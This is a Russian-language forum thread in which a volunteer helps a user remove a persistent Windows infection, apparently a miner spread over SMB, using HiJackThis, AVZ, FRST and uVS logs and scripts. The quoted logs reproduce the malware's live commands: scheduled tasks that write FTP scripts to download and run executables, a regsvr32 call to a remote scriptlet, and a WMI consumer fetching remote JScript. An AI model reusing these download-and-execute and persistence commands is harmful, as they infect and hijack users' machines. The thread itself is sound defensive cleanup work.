David Goliath 0 Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Сегодня неизвестно откуда схватил несколько вирусов. Есть подорение на браузеры, т.к. появилось уведомление что расширение Tampermonkey и Adblock, которыми обновлены. Антивирус Касперского перестал запускаться (днем работал), в безопасном режиме находит lsmosee.exe, mysa, mysa1, mysa2, mysa3... Лечит, но после перезагрузки они вновь появляются: сначала на секунду открывается командная строка где успеваешь заметить lsmose.exe - потом в Диспетчере Задач видишь TODO: <文件说明 Файлы: CollectionLog-2018.10.30-22.26.zip Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Здравствуйте,Что за роутер у Вас?HiJackThis (из каталога autologger)профикситьВажно: необходимо отметить и профиксить только то, что указано ниже. O2 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file) O2-32 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file) O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: my IP - Destination: Any IP (Port 3333 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: my IP - Destination: Any IP (Port 5555 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: my IP - Destination: Any IP (Port 7777 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2018/10/30) - {ef91e8b1-e92e-4bbd-b435-241ea1bb9b7c} - Source: my IP - Destination: Any IP (Port 9000 TCP) (mirrored) - Action: Block O9-32 - Button: HKLM\..\{A52C66B3-D4A9-4d10-A67D-2BEF0A85AB3F}: WinToFlash Suggestor - (no file) O9-32 - Tools menu item: HKLM\..\{A52C66B3-D4A9-4d10-A67D-2BEF0A85AB3F}: WinToFlash Suggestor options - (no file) O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe O22 - Task: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file) O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.0814ok.info:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes) AVZ выполнить следующий скрипт.Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора. begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('c:\windows\debug\ok.dat',''); QuarantineFile('c:\windows\help\lsmosee.exe>',''); QuarantineFile('c:\windows\debug\item.dat>',''); QuarantineFile('c:\windows\debug\item.dat',''); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32'); DeleteSchedulerTask('Mysa3'); DeleteSchedulerTask('Mysa2'); DeleteFile('c:\windows\debug\item.dat','64'); DeleteFile('c:\windows\debug\item.dat>','64'); DeleteFile('c:\windows\help\lsmosee.exe>','64'); DeleteSchedulerTask('ok'); DeleteFile('c:\windows\debug\ok.dat','64'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится.После перезагрузки:- Выполните в AVZ: begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end. quarantine.zip из папки AVZ загрузите этот архив через данную форму Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS. Также сообщите если вы установили обновления для Windows 7 X64:KB4012212KB4012215 Цитата Ссылка на сообщение Поделиться на другие сайты
David Goliath 0 Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 @SQ, Роутер Zyxel Keenetic Start, эти обновления не стоят, последний раз обновлся в 2016 году. Вот этот пункт не смог проделать, в конце выходит ошибка с разными дурацкими именами вроде: Программа "zchcsvo" не работает и сделайте полный образ автозапуска uVS. Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Установите обновления которые я указал, похоже эксплуатируют уязвимость SMB. Роутер Вас случайно не настроен как мост (bridge). Закройте входящие порты SMB (139, 445) в Windows Firewall.- Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5". Нажмите кнопку Scan. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении. Цитата Ссылка на сообщение Поделиться на другие сайты
David Goliath 0 Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 Обновления установил, порты закрыл, в роутере стоит Интернет центр - основной режим (есть Адаптер – подключение Ethernet-устройств к сети Wi-Fi, Усилитель – расширение зоны Wi-Fi, Точка доступа – расширение зоны Wi-Fi с подключением по Ethernet). Вот отчет: Еще обновления ОС устанавливались аж в 2014 году. Addition.txt FRST.txt Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Удалите Driver Booster (Iobit) через установку программ в панели управления. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:CreateRestorePoint: CloseProcesses: (TODO: <公司名>) C:\Windows\Temp\conhost.exe HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll Toolbar: HKU\S-1-5-21-3827699546-3351340401-287518781-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} - No File Toolbar: HKU\S-1-5-21-3827699546-3351340401-287518781-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} - No File FF Plugin: @microsoft.com/GENUINE -> disabled [No File] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] S2 Ms7DB53800App; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL) S2 Ms7DB53800App; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL) File: C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll File: C:\Windows\System32\Drivers\NVStrap.sys NETSVC: Ms7DB53800App -> no filepath. 2018-10-30 23:20 - 2018-10-30 23:20 - 000003520 _____ C:\Windows\System32\Tasks\Mysa 2018-10-30 23:20 - 2018-10-30 23:20 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3 2018-10-30 23:20 - 2018-10-30 23:20 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2 2018-10-30 21:56 - 2018-10-30 23:20 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1 2018-10-30 21:56 - 2018-10-30 23:20 - 000003186 _____ C:\Windows\System32\Tasks\ok 2018-10-30 19:11 - 2018-10-30 19:11 - 000000084 _____ C:\Program Files\Common Files\xp.dat 2018-10-30 19:11 - 2018-10-30 19:11 - 000002587 _____ C:\Windows\cpu.txt 2018-10-30 19:11 - 2018-10-30 19:11 - 000000406 _____ C:\Windows\config.txt 2018-10-30 19:11 - 2018-10-30 19:11 - 000000336 _____ C:\Windows\pools.txt 2018-10-30 15:51 - 2018-10-30 20:54 - 000000081 _____ C:\Windows\system32\s 2018-10-30 15:51 - 2018-10-30 20:54 - 000000079 _____ C:\Windows\system32\ps 2018-10-30 15:51 - 2018-10-30 20:54 - 000000077 _____ C:\Windows\system32\p 2018-10-30 15:50 - 2018-10-30 23:18 - 000027136 _____ (Microsoft Corporation) C:\Windows\system\down.exe 2018-10-30 15:49 - 2018-10-30 23:16 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat 2018-10-30 15:49 - 2018-10-30 15:49 - 000000005 _____ C:\Windows\system32\1.txt File: C:\Windows\system32\Drivers\cnnctfy2.sys 2018-10-30 19:11 - 2018-10-30 19:11 - 000000084 _____ () C:\Program Files\Common Files\xp.dat 2018-10-30 15:49 - 2018-10-30 23:16 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat ContextMenuHandlers4: [RecuvaShellExt] -> [CC]{435E5DF5-2510-463C-B223-BDA47006D002} => -> No File ContextMenuHandlers6: [RecuvaShellExt] -> [CC]{435E5DF5-2510-463C-B223-BDA47006D002} => -> No File Task: {309A1AE4-23C6-4910-BA86-E015C6265E9A} - System32\Tasks\Driver Booster SkipUAC (Admin) => C:\Program Files (x86)\IObit\Driver Booster\5.4.0\DriverBooster.exe [2018-05-09] (IObit) Task: {443ACB49-E674-4211-992A-C592D5FB5041} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {648044DC-5162-4020-AC77-E61F27FC6605} - \KMSAutoNet -> No File <==== ATTENTION Task: {867DE704-9923-468C-B386-C825A95E4869} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION Task: {B288B299-E1ED-4B7C-BCAF-FF37D5CFDEFD} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION Task: {E223C031-E820-4DD2-9BB2-7BF6A5869EF4} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {E59750DE-AA91-4758-BDA7-18D8F3E1C8BC} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa Task: {F0DFB3D7-35B2-46A6-A2FA-8AB2E7BE9C66} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {FF358C8F-CAF9-476E-8AC6-767655F9F9DD} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION 2018-10-30 21:50 - 2018-10-30 23:19 - 002359296 _____ () C:\Windows\debug\item.dat HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dump_7DB53800.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ms7DB53800App => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dump_7DB53800.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ms7DB53800App => ""="Service" FirewallRules: [{9F6F365A-E4B2-46A8-89FD-9F7645AEF02C}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\DriverBooster.exe FirewallRules: [{E4C2056D-E613-46C9-B4BC-2B5AD1A63A9C}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\DriverBooster.exe FirewallRules: [{E3DEF500-0E3B-4740-883B-7EFF8B608DC0}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\DBDownloader.exe FirewallRules: [{6E43D2DA-5F3D-4930-B02A-721F1001DBCA}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\DBDownloader.exe FirewallRules: [{92A209F5-95AA-496E-816A-7F7C66B4C438}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\AutoUpdate.exe FirewallRules: [{160E4EC8-BEA4-418D-A88E-2B2CD739D3A8}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.4.0\AutoUpdate.exe c:\windows\help\lsmosee.exe Reboot: Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Цитата Ссылка на сообщение Поделиться на другие сайты
David Goliath 0 Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 Прикрепляю Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS. Цитата Ссылка на сообщение Поделиться на другие сайты
David Goliath 0 Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 (изменено) Получилось в этот раз: PC_2018-10-30_23-52-25_v4.1.1.7z Изменено 30 октября, 2018 пользователем David Goliath Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Выполните скрипт в uVS: ;uVS v4.0.11 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c OFFSGNSAVE BREG delref HTTP://JS.FTP0930.HOST:280/V.SCT delall %SystemRoot%\DEBUG\ITEM.DAT delref HTTPS://DUCKDUCKGO.COM/?Q={SEARCHTERMS} delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.23.9\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.23.9\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.24.15\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.24.15\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.25.11\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.25.11\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.25.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.25.5\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.26.9\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.27.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.27.5\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.1\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.13\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.13\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.15\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.1\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.30.3\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.7\PSMACHINE_64.DLL delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\TEMP\3FE72A42.SYS delall %SystemRoot%\DEBUG\OK.DAT delall C:\WINDOWS\HELP\LSMOSEE.EXE zoo C:\WINDOWS\UPDATE.EXE restart Проверьте если образуется карантин, папка ZOO в каталоге uVS, если она не будет пустой то заархивируйте ее в zoo.zip и загрузите этот архив через данную форму Цитата Ссылка на сообщение Поделиться на другие сайты
David Goliath 0 Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 (изменено) После последней операции компьютер после запуска виснет намертво UPD: Все, загрузил, через Мозилу Фаерфокс вышло, предыдущее сообщение касается Хрома Изменено 30 октября, 2018 пользователем David Goliath Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Странное поведение с хромом. Сообщите, что с проблемой? По хрому попробуйте отключить все расширения, возможно была подмена. Цитата Ссылка на сообщение Поделиться на другие сайты
David Goliath 0 Опубликовано 30 октября, 2018 Автор Share Опубликовано 30 октября, 2018 (изменено) @SQ, Запустил таки Хром. Но Антивирус Каспесркого до сих пор не запускается, те вирусы не исчезли, в Диспетчере задач до сих пор висит: conhost.exe TODO: <文件说明. Каспесркий в безопастном режиме продолжает находить копии mysa, lsmose.exe Они даже в CCleaner видны в вклакде Автозагрузка - Запланированные задачи: Task Mysa1 Microsoft Corporation rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa Task Mysa2 cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p Task Mysa3 cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe Task ok Microsoft Corporation rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa Изменено 30 октября, 2018 пользователем David Goliath Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 30 октября, 2018 Share Опубликовано 30 октября, 2018 Приложите пожалуйста новые логи утилиты автологгера, те что делали изначально. Цитата Ссылка на сообщение Поделиться на другие сайты
David Goliath 0 Опубликовано 31 октября, 2018 Автор Share Опубликовано 31 октября, 2018 новый Проблема кажется решена, вручную удалил эти Mysa в планировщике задач (до этого их там не было), удалил lsmosee.exe в c/windows/debug. Антивирус запустился. Завтра примерно в 16:00 отпишусь CollectionLog-2018.10.31-01.44.zip Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.